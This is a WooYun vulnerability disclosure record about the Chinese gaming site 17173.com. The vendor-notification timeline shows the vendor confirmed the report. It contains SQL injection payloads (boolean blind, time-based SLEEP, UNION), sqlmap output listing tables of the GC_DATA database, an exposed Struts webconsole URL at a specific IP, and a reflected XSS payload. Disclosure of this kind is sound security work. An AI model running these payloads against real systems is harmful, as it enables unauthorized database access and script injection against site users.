乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-24: 细节已通知厂商并且等待厂商处理中 2015-05-26: 厂商已经确认,细节仅向厂商公开 2015-06-05: 细节向核心白帽子及相关领域专家公开 2015-06-15: 细节向普通白帽子公开 2015-06-25: 细节向实习白帽子公开 2015-07-10: 细节向公众公开
人若无名 苦心练剑
0x01:POST型注入gc.17173.com/GameDetailid=39
0x02:POST型注入http://gc.17173.com/Lessonstype=2
Parameter: id (POST) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: id=(SELECT (CASE WHEN (2699=2699) THEN 2699 ELSE 2699*(SELECT 2699FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))FSup) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7a71,0x4a575749545043697a6b,0x716a6a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-----[21:24:52] [INFO] testing MySQL[21:24:52] [INFO] confirming MySQL[21:24:52] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL >= 5.0.0[21:24:52] [INFO] fetching tables for database: 'GC_DATA'[21:24:52] [INFO] the SQL query used returns 56 entriesDatabase: GC_DATA[56 tables]+----------------------------+| DT_BAT_DOWNLOAD || DT_COM_AREA || DT_COM_CONFIG || DT_COM_COUNTRY || DT_COM_DEVICE || DT_COM_DEVICE_CONFIG || DT_COM_PROVINCE || DT_COM_SCHOOL || DT_COM_VENDOR || DT_ENL_WX_KEYWORD || DT_ENL_WX_MENU || DT_ENL_WX_REPLY || DT_ENL_WX_REPLY_ITEM || DT_ENL_WX_REPLY_KEYWORD || DT_LGC_ACTIVITY || DT_LGC_BOUNTY || DT_LGC_EVENT || DT_LGC_FEEDBACK || DT_LGC_GOODS || DT_LGC_GUIDE |
0x03: webconsole未授权访问http://220.181.143.170:81//struts/webconsole.html
0x04: iis短域名漏洞http://chibi.db.17173.com
0x05: 反射型xsshttp://gc.17173.com/web/reward/Reward.wa?do=--%3E%27%22%3E%3Csvg/onload=alert(1)%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&id=2
你们应该比较懂..
危害等级:中
漏洞Rank:8
确认时间:2015-05-26 18:44
谢谢支持!!
暂无